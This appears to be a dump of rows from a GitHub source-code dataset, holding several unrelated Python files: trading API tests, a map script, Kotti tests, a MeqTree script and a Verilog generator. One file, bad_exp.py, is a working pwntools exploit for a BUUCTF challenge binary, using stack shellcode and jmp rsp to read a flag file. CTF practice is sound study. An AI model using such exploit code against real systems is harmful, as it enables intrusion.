| blob_id (string, length 40) | directory_id (string, length 40) | path (string, length 2-616) | content_id (string, length 40) | detected_licenses (list, length 0-69) | license_type (string, 2 classes) | repo_name (string, length 5-118) | snapshot_id (string, length 40) | revision_id (string, length 40) | branch_name (string, length 4-63) | visit_date (timestamp[us]) | revision_date (timestamp[us]) | committer_date (timestamp[us]) | github_id (int64, 2.91k-686M, nullable) | star_events_count (int64, 0-209k) | fork_events_count (int64, 0-110k) | gha_license_id (string, 23 classes) | gha_event_created_at (timestamp[us]) | gha_created_at (timestamp[us]) | gha_language (string, 213 classes) | src_encoding (string, 30 classes) | language (string, 1 class) | is_vendor (bool) | is_generated (bool) | length_bytes (int64, 2-10.3M) | extension (string, 246 classes) | content (string, length 2-10.3M) | authors (list, length 1) | author_id (string, length 0-212) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
eea4930741d6abd56735388dbe5fee2b2f87ee75
|
d3efc82dfa61fb82e47c82d52c838b38b076084c
|
/Autocase_Result/GEM_REGISTER/YW_GEM_REGISTERMM_SZXJ_127.py
|
27528edb669f197e9109add7e5ebe607c5e736eb
|
[] |
no_license
|
nantongzyg/xtp_test
|
58ce9f328f62a3ea5904e6ed907a169ef2df9258
|
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
|
refs/heads/master
| 2022-11-30T08:57:45.345460
| 2020-07-30T01:43:30
| 2020-07-30T01:43:30
| 280,388,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,098
|
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_GEM_REGISTERMM_SZXJ_127(xtp_test_case):
# YW_GEM_REGISTERMM_SZXJ_127
def test_YW_GEM_REGISTERMM_SZXJ_127(self):
title = '创业板股票交易日限价委托卖-允许的最小申报数量+1(100+1)'
        # Define the expected values for the current test case
        # Expected status: initial, unfilled, partially filled, fully filled, partial cancel reported, partially cancelled, reported pending cancel, cancelled, rejected, cancel rejected, internally cancelled
        # xtp_ID and cancel_xtpID default to 0 and do not need to be changed
case_goal = {
'期望状态': '废单',
'errorID': 11010123,
'errorMSG': queryOrderErrorMsg(11010123),
'是否生成报单': '是',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
        # Define the order parameters ------------------------------------------
        # Parameters: ticker, market, security type, security status, trading status, side (B=buy, S=sell), expected status, Api
stkparm = QueryStkPriceQty('300200', '2', '2', '2', '0', 'S', case_goal['期望状态'], Api)
        # If fetching the order parameters fails, the test case fails
if stkparm['返回结果'] is False:
rs = {
'用例测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
self.assertEqual(rs['用例测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_CASH'],
'order_client_id':2,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SZ_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_BUY'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_LIMIT'],
'price': stkparm['随机中间价'],
'quantity': 101,
'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
CaseParmInsertMysql(case_goal, wt_reqs)
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['用例测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
self.assertEqual(rs['用例测试结果'], True) # 0
if __name__ == '__main__':
unittest.main()
|
[
"418033945@qq.com"
] |
418033945@qq.com
|
61d2c3982e7271cd9a61b62154ec8ce6e0dbf60f
|
d72360671c444f0aab2c9d6d1a138fd5ac7ec145
|
/mapping/map1.py
|
20c951fb7fdc52ab030e7e61622dd845105c7bf2
|
[] |
no_license
|
sfagade/python_ramp-up
|
b068c5bff0c48328f1596b6ff6f123520ca9d11d
|
0eaa41a86353b48ad3fa482b387e819977c27435
|
refs/heads/master
| 2022-12-29T01:03:53.982925
| 2020-10-09T20:50:40
| 2020-10-09T20:50:40
| 289,117,000
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 897
|
py
|
import folium
import pandas
data = pandas.read_csv("Volcanoes.txt")
lon = list(data["LON"])
lat = list(data["LAT"])
elev = list(data["ELEV"])
def color_producer(elevation):
if elevation < 1000:
return "green"
elif 1000 <= elevation < 3000:
return "orange"
else:
return "red"
# map = folium.Map(location=[6.501990, 3.337579], zoom_start=16, tiles="Stamen Terrain")
my_map = folium.Map(location=[38.58, -99.09], zoom_start=6, tiles="Stamen Terrain")
fg = folium.FeatureGroup(name="my Map")
for lt, ln, el in zip(lat, lon, elev):
    fg.add_child(folium.CircleMarker(location=[lt, ln], radius=6, popup=str(el) + " m",
                                     fill_color=color_producer(el), color="grey", fill_opacity=0.7))
fg.add_child(folium.GeoJson(data=open("world.json", "r", encoding="utf-8-sig").read()))
my_map.add_child(fg)
my_map.save("Map1.html")
|
[
"sfagade@gmail.com"
] |
sfagade@gmail.com
|
14592b2360ff1e4a73c58ab9b09115d28d53b208
|
9ba3b695fb56cce1a71a6aeb906bdf022d18fb37
|
/Actividades/AC03/archivos.py
|
f4ff7b705afb4f2fd5a4e9d6b297bbcbbb3ab691
|
[] |
no_license
|
Gaonuk/IIC2233-Gaonuk
|
6b44bdf4fb722f5bc86fdd57260863c8c5b0f123
|
30d7bf836c4987de321deda0ea8fe0bff461bd98
|
refs/heads/main
| 2023-01-01T14:25:27.025071
| 2020-10-19T23:42:22
| 2020-10-19T23:42:22
| 305,539,557
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,685
|
py
|
from yoNube import descargar
from decodificador import decodificar
from collections import namedtuple
import os
# ------ STRUCTURES ------
Cancion = namedtuple("Cancion", ["id", "nombre", "id_artista", "duracion"])
Artista = namedtuple("Artista", ["id", "nombre", "genero", "ano_formacion"])
Usuario = namedtuple("Usuario", ["nombre", "username", "fecha_ingreso"])
Rating = namedtuple("Rating", ["username", "id_cancion", "rating"])
# ----- DECORATOR -------
def desencriptar(funcion_decodificadora, tipo_archivo):
    """
    Decorator that decrypts the databases.
    Decryption requires a decoding function.
    """
    # This is the decorator's base code and is fully editable
    def decorador(funcion_a_decorar):
        def wrapper(*args, **kwargs):
            for linea in funcion_a_decorar(*args, **kwargs):
                # Decode every attribute of the line, then build the matching namedtuple
                atributos_desencriptados = [funcion_decodificadora(atributo) for atributo in linea]
                if tipo_archivo == 'canciones':
                    yield Cancion(*atributos_desencriptados)
                elif tipo_archivo == 'artistas':
                    yield Artista(*atributos_desencriptados)
                elif tipo_archivo == 'usuarios':
                    yield Usuario(*atributos_desencriptados)
                elif tipo_archivo == 'ratings':
                    yield Rating(*atributos_desencriptados)
        return wrapper
    return decorador
# ------------------------------------------------------------
# --------- DO NOT MODIFY THE FUNCTIONS, ONLY DECORATE THEM ---------
# ------------------------------------------------------------
@desencriptar(decodificar, "canciones")
def leer_canciones(path):
"""
    This function receives a path and returns a generator with the data.
    Note that each line is split on the commas, so it yields
    5 elements.
    Decorate it to:
    =============
    - Decrypt the data.
    - Return the corresponding instances.
"""
with open(path, 'r', encoding = 'utf-8') as archivo:
for linea in archivo:
yield linea.strip().split(',')
@desencriptar(decodificar, "artistas")
def leer_artistas(path):
"""
    This function receives a path and returns a generator with the data.
    Note that each line is split on the commas, so it yields
    4 elements.
    Decorate it to:
    =============
    - Decrypt the data.
    - Return the corresponding instances.
"""
with open(path, 'r', encoding = 'utf-8') as archivo:
for linea in archivo:
yield linea.strip().split(',')
@desencriptar(decodificar, "usuarios")
def leer_usuarios(path):
"""
    This function receives a path and returns a generator with the data.
    Note that each line is split on the commas, so it yields
    3 elements.
    Decorate it to:
    =============
    - Decrypt the data.
    - Return the corresponding instances.
"""
with open(path, 'r', encoding = 'utf-8') as archivo:
for linea in archivo:
yield linea.strip().split(',')
@desencriptar(decodificar, "ratings")
def leer_ratings(path):
"""
    This function receives a path and returns a generator with the data.
    Note that each line is split on the commas, so it yields
    3 elements.
    Decorate it to:
    =============
    - Decrypt the data.
    - Return the corresponding instances.
"""
with open(path, 'r', encoding = 'utf-8') as archivo:
for linea in archivo:
yield linea.strip().split(',')
if __name__ == "__main__":
ruta_canciones = os.path.join("data_base", "canciones.csv")
canciones = leer_canciones(ruta_canciones)
ruta_artistas = os.path.join("data_base", "artistas.csv")
artistas = leer_artistas(ruta_artistas)
ruta_usuarios = os.path.join("data_base", "usuarios.csv")
usuarios = leer_usuarios(ruta_usuarios)
ruta_ratings = os.path.join("data_base", "ratings.csv")
ratings = leer_ratings(ruta_ratings)
generadores = [canciones, artistas, usuarios, ratings]
for gen in generadores:
print(f"\nProbando generador : ")
print(next(gen))
print(next(gen))
print(next(gen))
print(next(gen))
|
[
"rodrigogaonagonzalez@gmail.com"
] |
rodrigogaonagonzalez@gmail.com
|
216a68959b056f2c905551380a0307e8239cc347
|
fc267c989485555d8cf9c857c150c38fe7e7ee4c
|
/bank/urls.py
|
b7e1bfa5159a897f751c361128df84d157fd7633
|
[] |
no_license
|
oladejioluwaseun/Django-task-using-bank-instead-of-blog
|
fe8be45b26675c6fd16407e30384a874eba3852d
|
d52c66bb588eb5b0914f30def0bd788d05470922
|
refs/heads/main
| 2023-06-16T23:42:24.392683
| 2021-07-07T19:17:31
| 2021-07-07T19:17:31
| 384,074,816
| 0
| 0
| null | 2021-07-08T09:41:04
| 2021-07-08T09:41:03
| null |
UTF-8
|
Python
| false
| false
| 673
|
py
|
from django.urls import path
from .views import (
BlogListView,
BlogDetailView,
BlogCreateView,
BlogUpdateView,
BlogDeleteView,
add_comment_to_post,
)
urlpatterns = [
path('post/<int:pk>/delete/',BlogDeleteView.as_view(),
name='post_delete'),
path('post/<int:pk>/comment/',add_comment_to_post, name='add_comment_to_post'),
path('post/<int:pk>/edit/',BlogUpdateView.as_view(),
name='post_edit'),
path('post/new/', BlogCreateView.as_view(), name='post_new'),
path('post/<int:pk>/',BlogDetailView.as_view(),
name='post_detail'),
path('', BlogListView.as_view(), name='home')
]
|
[
"taiwobukola98@gmail.com"
] |
taiwobukola98@gmail.com
|
e00d2bd87c9b7d1500ef6138338e98dbd89536ac
|
595f2d2156efa97da6f667b01375c6f9176184be
|
/BUUCTF/Ubuntu16.04/bad_exp.py
|
a4d7877406a8235d2531783f7f2af9954a67489b
|
[] |
no_license
|
R4ilgun/my_pwn
|
466f6b7d3dde2d6b9ccc2a56fcef97b24247b123
|
16ce89f15da6f5440d42c97f045fda44c609c904
|
refs/heads/master
| 2020-12-22T05:18:52.645593
| 2020-08-16T07:15:57
| 2020-08-16T07:15:57
| 236,680,643
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 861
|
py
|
#! /usr/bin/python
import sys
from pwn import *
from LibcSearcher import *
sl = lambda x:p.sendline(x)
sd = lambda x:p.send(x)
sda = lambda x,y:p.sendafter(x,y)
sla = lambda x,y:p.sendlineafter(x,y)
rv = lambda x:p.recv(x)
ru = lambda x:p.recvuntil(x)
ia = lambda :p.interactive()
context(arch="amd64",os="Linux",log_level='debug')
if(sys.argv[1] == 'l'):
p = process("./bad")
elf = ELF("./bad")
else:
p = remote('node3.buuoj.cn',25335)
elf = ELF("./bad")
mmap=0x123000
jmp_rsp=0x400A01
payload = (asm(shellcraft.read(0,mmap,0x100)) + asm("mov rax,0x123000;call rax")).ljust(0x28,'\x00')
payload+= p64(jmp_rsp) + asm("sub rsp,0x30;jmp rsp")
sda("have fun!\n",payload)
shellcode = shellcraft.open('./flag')
shellcode+= shellcraft.read(3,mmap,0x50)
shellcode+= shellcraft.write(1,mmap,0x50)
shellcode = asm(shellcode)
sleep(0.1)
sl(shellcode)
ia()
|
[
"noreply@github.com"
] |
R4ilgun.noreply@github.com
|
3e3ddce1f52bf0d064e62d2045cc7877ad848187
|
923a3f7be34e10931936823df0740d5d845d26e5
|
/Courses/Workshop2007/ME2/example2-nps-meow.py
|
3a1cddff5066679cab4ca870d06a51b0f1acb030
|
[] |
no_license
|
o-smirnov/public-documents
|
0572ccef548a321e70b8cad2e2f2c249926f017d
|
9e758ddf375c0f748376d2e37d0fea9661ed7c37
|
refs/heads/master
| 2021-01-15T23:40:03.183127
| 2015-06-04T17:18:22
| 2015-06-04T17:18:22
| 31,723,928
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,058
|
py
|
# standard preamble
#
#% $Id$
#
#
# Copyright (C) 2002-2007
# The MeqTree Foundation &
# ASTRON (Netherlands Foundation for Research in Astronomy)
# P.O.Box 2, 7990 AA Dwingeloo, The Netherlands
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>,
# or write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
from Timba.TDL import *
from Timba.Meq import meq
import math
import Meow
import Meow.Utils
import Meow.Bookmarks
import Meow.StdTrees
# some GUI options
Meow.Utils.include_ms_options(has_input=False,tile_sizes=[16,32,48,96]);
Meow.Utils.include_imaging_options(npix=256,arcmin=4,channels=[[32,1,1]]);
# define antenna list
ANTENNAS = range(1,28);
# useful constant: 1 deg in radians
DEG = math.pi/180.;
ARCMIN = DEG/60;
# source flux (same for all sources)
I = 1; Q = .2; U = .2; V = .2;
# we'll put the sources on a grid (positions in arc min)
LM = [(-1,-1),(-1,0),(-1,1),
( 0,-1),( 0,0),( 0,1),
( 1,-1),( 1,0),( 1,1)];
def _define_forest (ns):
# create an Array object
array = Meow.IfrArray(ns,ANTENNAS);
# create an Observation object
observation = Meow.Observation(ns);
# set global context
Meow.Context.set(array=array,observation=observation);
# create 10 sources
sources = [];
for isrc in range(len(LM)):
l,m = LM[isrc];
l *= ARCMIN;
m *= ARCMIN;
# generate a name for this direction and source
srcname = 'S'+str(isrc);
# create Direction object
src_dir = Meow.LMDirection(ns,srcname,l,m);
# create point source with this direction
sources.append( Meow.PointSource(ns,srcname,src_dir,I=I,Q=Q,U=U,V=V) );
# create a Patch for the entire observed sky
allsky = Meow.Patch(ns,'all',observation.phase_centre);
allsky.add(*sources);
# create set of nodes to compute visibilities...
predict = allsky.visibilities();
# make some useful inspectors. Collect them into a list, since we need
# to give a list of 'post' nodes to make_sinks() below
inspectors = [];
inspectors.append(
Meow.StdTrees.vis_inspector(ns.inspect_predict,predict) );
for i in [0,1,4,5]:
inspectors.append(
Meow.StdTrees.vis_inspector(ns.inspect_predict(i),sources[i].visibilities(),bookmark=False) );
# make sinks and vdm. Note that we don't want to make any spigots...
# The list of inspectors comes in handy here
Meow.StdTrees.make_sinks(ns,predict,spigots=False,post=inspectors);
# make some bookmarks. Note that inspect_predict gets its own bookmark
# automatically; for the others we said bookmark=False because we
# want to put them onto a single page
pg = Meow.Bookmarks.Page("Inspectors",2,2);
for i in [0,1,4,5]:
pg.add(ns.inspect_predict(i),viewer="Collections Plotter");
# make a few more bookmarks
pg = Meow.Bookmarks.Page("K Jones",2,2);
for p in array.stations()[1:4]: # use stations 1 through 3
for src in sources[:4]: # use sources 0 through 3
pg.add(src.direction.KJones()(p));
def _tdl_job_1_simulate_MS (mqs,parent):
req = Meow.Utils.create_io_request();
# execute
mqs.execute('VisDataMux',req,wait=False);
# this is a useful thing to have at the bottom of the script, it allows us to check the tree for consistency
# simply by running 'python script.tdl'
if __name__ == '__main__':
ns = NodeScope();
_define_forest(ns);
# resolves nodes
ns.Resolve();
print len(ns.AllNodes()),'nodes defined';
|
[
"osmirnov@gmail.com"
] |
osmirnov@gmail.com
|
f11fccf1de6f0337bc9f35255087e07d844ab455
|
e33c95326f6800d435125427a73460a009532a12
|
/kotti/tests/test_node.py
|
2b37ce96b1532b6dd48906b0dc6308fb2ca9c3ba
|
[
"BSD-3-Clause-Modification"
] |
permissive
|
stevepiercy/Kotti
|
839269f6dc1c45645e5d868b0f17e27bea04b5ac
|
45c1627ae9fedbc24d1b817048e153f4d7a2d06d
|
refs/heads/master
| 2021-01-17T21:33:02.795714
| 2012-03-17T22:06:04
| 2012-03-17T22:06:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,835
|
py
|
from pyramid.security import ALL_PERMISSIONS
from sqlalchemy.exc import IntegrityError
from sqlalchemy.exc import SQLAlchemyError
from kotti.testing import UnitTestBase
class TestNode(UnitTestBase):
def test_root_acl(self):
from kotti.resources import get_root
root = get_root()
# The root object has a persistent ACL set:
self.assertEquals(
root.__acl__[1:], [
('Allow', 'system.Everyone', ['view']),
('Allow', 'role:viewer', ['view']),
('Allow', 'role:editor', ['view', 'add', 'edit']),
('Allow', 'role:owner', ['view', 'add', 'edit', 'manage']),
])
# Note how the first ACE is class-defined. Users of the
# 'admin' role will always have all permissions. This is to
# prevent lock-out.
self.assertEquals(root.__acl__[:1], root._default_acl())
def test_set_and_get_acl(self):
from kotti import DBSession
from kotti.resources import get_root
root = get_root()
# The __acl__ attribute of Nodes allows access to the mapped
# '_acl' property:
del root.__acl__
self.assertRaises(AttributeError, root._get_acl)
root.__acl__ = [['Allow', 'system.Authenticated', ['edit']]]
self.assertEquals(
root.__acl__, [
('Allow', 'role:admin', ALL_PERMISSIONS),
('Allow', 'system.Authenticated', ['edit']),
])
root.__acl__ = [
('Allow', 'system.Authenticated', ['view']),
('Deny', 'system.Authenticated', ALL_PERMISSIONS),
]
self.assertEquals(
root.__acl__, [
('Allow', 'role:admin', ALL_PERMISSIONS),
('Allow', 'system.Authenticated', ['view']),
('Deny', 'system.Authenticated', ALL_PERMISSIONS),
])
# We can reorder the ACL:
first, second = root.__acl__[1:]
root.__acl__ = [second, first]
self.assertEquals(
root.__acl__, [
('Allow', 'role:admin', ALL_PERMISSIONS),
('Deny', 'system.Authenticated', ALL_PERMISSIONS),
('Allow', 'system.Authenticated', ['view']),
])
DBSession.flush()
DBSession.expire_all()
self.assertEquals(root.__acl__[1:], [second, first])
root._del_acl()
self.assertRaises(AttributeError, root._del_acl)
def test_unique_constraint(self):
from kotti import DBSession
from kotti.resources import get_root
from kotti.resources import Node
# Try to add two children with the same name to the root node:
session = DBSession()
root = get_root()
session.add(Node(name=u'child1', parent=root))
session.add(Node(name=u'child1', parent=root))
self.assertRaises(IntegrityError, session.flush)
def test_container_methods(self):
from kotti import DBSession
from kotti.resources import get_root
from kotti.resources import Node
session = DBSession()
# Test some of Node's container methods:
root = get_root()
self.assertEquals(root.keys(), [])
child1 = Node(name=u'child1', parent=root)
session.add(child1)
self.assertEquals(root.keys(), [u'child1'])
self.assertEquals(root[u'child1'], child1)
del root[u'child1']
self.assertEquals(root.keys(), [])
# When we delete a parent node, all its child nodes will be
# released as well:
root[u'child2'] = Node()
root[u'child2'][u'subchild'] = Node()
self.assertEquals(
session.query(Node).filter(Node.name == u'subchild').count(), 1)
del root[u'child2']
self.assertEquals(
session.query(Node).filter(Node.name == u'subchild').count(), 0)
# We can pass a tuple as the key to more efficiently reach
# down to child objects:
root[u'child3'] = Node()
subchild33 = Node(name=u'subchild33', parent=root[u'child3'])
session.add(subchild33)
del root.__dict__['_children']
self.assertTrue(
root[u'child3', u'subchild33'] is root[u'child3'][u'subchild33'])
self.assertTrue(
root[(u'child3', u'subchild33')] is subchild33)
self.assertRaises(KeyError, root.__getitem__, (u'child3', u'bad-name'))
del root[u'child3']
# Overwriting an existing Node is an error; first delete manually!
child4 = Node(name=u'child4', parent=root)
session.add(child4)
self.assertEquals(root.keys(), [u'child4'])
child44 = Node(name=u'child4')
session.add(child44)
root[u'child4'] = child44
self.assertRaises(SQLAlchemyError, session.flush)
def test_node_copy_name(self):
from kotti.resources import get_root
root = get_root()
copy_of_root = root.copy(name=u'copy_of_root')
self.assertEqual(copy_of_root.name, u'copy_of_root')
self.assertEqual(root.name, u'')
def test_node_copy_variants(self):
from kotti.resources import get_root
from kotti.resources import Node
root = get_root()
child1 = root['child1'] = Node()
child1['grandchild'] = Node()
child2 = root['child2'] = Node()
# first way; circumventing the Container API
child2.children.append(child1.copy())
# second way; canonical way
child2['child2'] = child1.copy()
# third way; this is necessary in cases when copy() will
# attempt to put the new node into the db already, e.g. when
# the copy is already being back-referenced by some other
# object in the db.
child1.copy(parent=child2, name=u'child3')
assert [child.name for child in child2.children] == [
'child1', 'child2', 'child3']
def test_node_copy_parent_id(self):
from kotti import DBSession
from kotti.resources import get_root
from kotti.resources import Node
root = get_root()
child1 = root['child1'] = Node()
grandchild1 = child1['grandchild1'] = Node()
DBSession.flush()
grandchild2 = grandchild1.copy()
assert grandchild2.parent_id is None
assert grandchild2.parent is None
def test_node_copy_with_local_groups(self):
from kotti import DBSession
from kotti.resources import get_root
from kotti.resources import Node
from kotti.resources import LocalGroup
root = get_root()
child1 = root['child1'] = Node()
local_group1 = LocalGroup(child1, u'joe', u'role:admin')
DBSession.add(local_group1)
DBSession.flush()
child2 = root['child2'] = child1.copy()
DBSession.flush()
assert child2.local_groups == []
def test_clear(self):
from kotti import DBSession
from kotti.resources import get_root
from kotti.resources import Node
child = get_root()['child'] = Node()
assert DBSession.query(Node).filter(Node.name == u'child').all() == [
child]
get_root().clear()
assert DBSession.query(Node).filter(Node.name == u'child').all() == []
def test_annotations_mutable(self):
from kotti import DBSession
from kotti.resources import get_root
root = get_root()
root.annotations['foo'] = u'bar'
self.assertTrue(root in DBSession.dirty)
del root.annotations['foo']
def test_nested_annotations_mutable(self):
from kotti import DBSession
from kotti.resources import get_root
root = get_root()
root.annotations['foo'] = {}
DBSession.flush()
DBSession.expire_all()
root = get_root()
root.annotations['foo']['bar'] = u'baz'
self.assertTrue(root in DBSession.dirty)
DBSession.flush()
DBSession.expire_all()
root = get_root()
self.assertEqual(root.annotations['foo']['bar'], u'baz')
def test_annotations_coerce_fail(self):
from kotti.resources import get_root
root = get_root()
self.assertRaises(ValueError, setattr, root, 'annotations', [])
class TestLocalGroup(UnitTestBase):
def test_copy(self):
from kotti.resources import get_root
from kotti.resources import LocalGroup
node, principal_name, group_name = get_root(), 'p', 'g'
lg = LocalGroup(node, principal_name, group_name)
lg2 = lg.copy()
assert lg2 is not lg
assert lg.node is lg2.node
assert lg.principal_name == lg2.principal_name
assert lg.group_name == lg2.group_name
|
[
"daniel.nouri@gmail.com"
] |
daniel.nouri@gmail.com
|
53874b617f016a03515b45a9cf28f4a43fd997f7
|
d5529b54c8ff086f1fdb23e68825b4551feb3673
|
/ModbusRTUMasterBlocksGenerator.py
|
faf9ad749023f8c83cd155bf4ccbbf125e5555d8
|
[] |
no_license
|
SokolovRV/ModbusRTU
|
e0693864e8cb27346568e444886b2d5e3aee46ba
|
7ddc9aee65bf0e6ca75dc654f6caaa476faec2c8
|
refs/heads/master
| 2021-07-12T21:12:54.925822
| 2020-07-24T07:23:40
| 2020-07-24T07:23:40
| 170,082,041
| 11
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,266
|
py
|
from jinja2 import Template
input_module = Template("""
module data_mux_{{t_adress}}_{{t_prefix}} (
input clk,
input [7:0] selector,
{%- for n in range(t_n_ports_w) %}
input [15:0] data_{{n+t_first_reg_w}}_{{t_adress}},
{%- endfor %}
input reset,
output reg [7:0] adr,
output reg [15:0] adr_first_reg_tx,
output reg [7:0] num_reg_tx,
output reg [15:0] adr_first_reg_rx,
output reg [7:0] num_reg_rx,
output reg [15:0] data_out
);
parameter [7:0] slave_adr = {{t_adress}};
parameter [15:0] adr_first_reg_write = {{t_first_reg_w}};
parameter [7:0] num_reg_write = {{t_n_ports_w}};
parameter [15:0] adr_first_reg_read = {{t_first_reg_r}};
parameter [7:0] num_reg_write_read = {{t_n_ports_r}};
initial begin
data_out = 16'h0000;
adr = slave_adr;
adr_first_reg_tx = adr_first_reg_write;
num_reg_tx = num_reg_write;
adr_first_reg_rx = adr_first_reg_read;
num_reg_rx = num_reg_write_read;
end
always @(posedge clk) begin
if(reset)
data_out <= 16'h0000;
else begin
case(selector)
{%- for n in range(t_n_ports_w) %}
{{n+1}}: data_out <= data_{{n+t_first_reg_w}}_{{t_adress}};
{%- endfor %}
default: data_out <= 16'h0000;
endcase
end
end
endmodule
""")
output_module = Template("""
module data_demux_{{t_adress}}_{{t_prefix}} (
input clk,
input [7:0] adr,
input [7:0] n_data,
input [15:0] data_in,
input data_strb,
input crc_validate,
input reset,
{%- for n in range(t_n_ports_r) %}
output reg [15:0] data_{{n+t_first_reg_r}}_{{t_adress}}{% if (n+1)<t_n_ports_r %},{% endif %}
{%- endfor %}
);
parameter [7:0] slave_id = {{t_adress}};
parameter [7:0] number_of_reg = {{t_n_ports_r}};
(*ramstyle = "no_rw_check"*)reg [15:0] mem [number_of_reg:0];
reg previous_strb_0 = 1'b0;
reg [15:0] data_buff = 16'h0000;
reg [7:0] n = 8'h00;
initial begin
{%- for n in range(t_n_ports_r) %}
data_{{n+t_first_reg_r}}_{{t_adress}} = 16'h0000;
{%- endfor %}
end
always @(posedge clk) begin
if(reset)
data_buff <= 16'h0000;
else begin end
previous_strb_0 <= data_strb;
if(data_strb && !previous_strb_0 && adr == slave_id) begin
mem[n_data] <= data_in;
end
else begin end
if(crc_validate) begin
data_buff <= mem[n_data];
n <= n_data;
end
else begin end
end
always @(posedge clk) begin
if(reset) begin
{%- for n in range(t_n_ports_r) %}
data_{{n+t_first_reg_r}}_{{t_adress}} <= 16'h0000;
{%- endfor %}
end
else begin
case(n)
{%- for n in range(t_n_ports_r) %}
{{n+1}}: data_{{n+t_first_reg_r}}_{{t_adress}} <= data_buff;
{%- endfor %}
default: begin end
endcase
end
end
endmodule
""")
select_module = Template("""
module slave_select_{{t_prefix}} (
input clk,
{%- for n in t_n_slaves %}
input [7:0] adr_{{n}},
input [15:0] adr_first_reg_tx_{{n}},
input [7:0] num_reg_tx_{{n}},
input [15:0] adr_first_reg_rx_{{n}},
input [7:0] num_reg_rx_{{n}},
input [15:0] data_in_{{n}},
{%- endfor %}
input transfer_done,
input reset,
output reg [7:0] adr,
output reg [15:0] adr_first_reg_tx,
output reg [7:0] num_reg_tx,
output reg [15:0] adr_first_reg_rx,
output reg [7:0] num_reg_rx,
output reg [15:0] data_out
);
parameter [7:0] number_of_slaves = {{t_cnt_slaves}};
reg [7:0] selector = 8'h01;
reg previous_strb = 1'b0;
initial begin
adr = 8'h00;
adr_first_reg_rx = 16'h0000;
adr_first_reg_tx = 16'h0000;
num_reg_rx = 8'h00;
num_reg_tx = 8'h00;
data_out = 16'h0000;
end
always @(posedge clk) begin
if(reset) begin
selector <= 8'h01;
end
else begin
previous_strb <= transfer_done;
if(transfer_done && !previous_strb) begin
if(selector == number_of_slaves)
selector <= 8'h01;
else
selector <= selector + 8'h01;
end
else begin end
case(selector)
{%- for n in range(t_cnt_slaves) %}
{{n+1}}: begin
adr <= adr_{{t_n_slaves[n]}};
adr_first_reg_rx <= adr_first_reg_rx_{{t_n_slaves[n]}};
adr_first_reg_tx <= adr_first_reg_tx_{{t_n_slaves[n]}};
num_reg_rx <= num_reg_rx_{{t_n_slaves[n]}};
num_reg_tx <= num_reg_tx_{{t_n_slaves[n]}};
data_out <= data_in_{{t_n_slaves[n]}};
end
{%- endfor %}
default: begin end
endcase
end
end
endmodule
""")
print('\n ::: Modbus ports modules generator (Verilog) :::\n'
' ::: version: 1.0 :::\n '
'::: developer: Sokolov R.V. :::\n '
'::: For more information read the txt file in root folder ::: \n\n')
mode = int(input('What modules need to be generated (select 1 or 2):\n'
' 1. - input + output modules \n'
' 2. - select module\n'
' Your choice: '))
print('\n')
if mode == 1:
p_prefix = input('\nInput prefix for modules names (data_mux(/demux)_{your prefix}.v): ')
p_address = int(input('Input address of slave device: '))
p_n_ports_w = int(input('Input count of INPUT ports: '))
p_first_reg_w = int(input('Input number of first register for WRITE in slave (INPUT): '))
p_n_ports_r = int(input('Input count of OUTPUT ports: '))
p_first_reg_r = int(input('Input number of first register for READ in slave (OUTPUT): '))
txt_in = input_module.render(
t_prefix = p_prefix,
t_adress = p_address,
t_n_ports_w = p_n_ports_w,
t_n_ports_r = p_n_ports_r,
t_first_reg_w = p_first_reg_w,
t_first_reg_r = p_first_reg_r
)
txt_out = output_module.render(
t_prefix = p_prefix,
t_adress = p_address,
t_n_ports_r = p_n_ports_r,
t_first_reg_r = p_first_reg_r
)
file_name_in = 'data_mux_' + p_prefix + '.v'
file_name_out = 'data_demux_' + p_prefix + '.v'
file = open(file_name_in, 'w')
file.write(txt_in)
file.close()
file = open(file_name_out, 'w')
file.write(txt_out)
file.close()
print('\n >>> ' + file_name_in + '\n >>> ' + file_name_out + ' - files was generated in root folder! \n\n')
if mode == 2:
n_slaves = int(input('How many slave devices are used: '))
p_n_slaves = list(range(n_slaves))
for i in range(n_slaves):
p_n_slaves[i] = int(input(' Input address of slave device number - ' + str(i+1) + ': '))
